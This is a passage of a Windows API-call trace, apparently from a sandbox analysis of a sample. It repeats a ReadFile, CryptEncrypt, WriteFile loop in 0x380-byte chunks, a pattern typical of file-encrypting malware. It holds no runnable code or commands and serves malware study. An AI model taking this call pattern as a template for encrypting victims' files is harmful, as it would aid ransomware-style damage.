| out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.827] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.829] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.830] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.832] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] 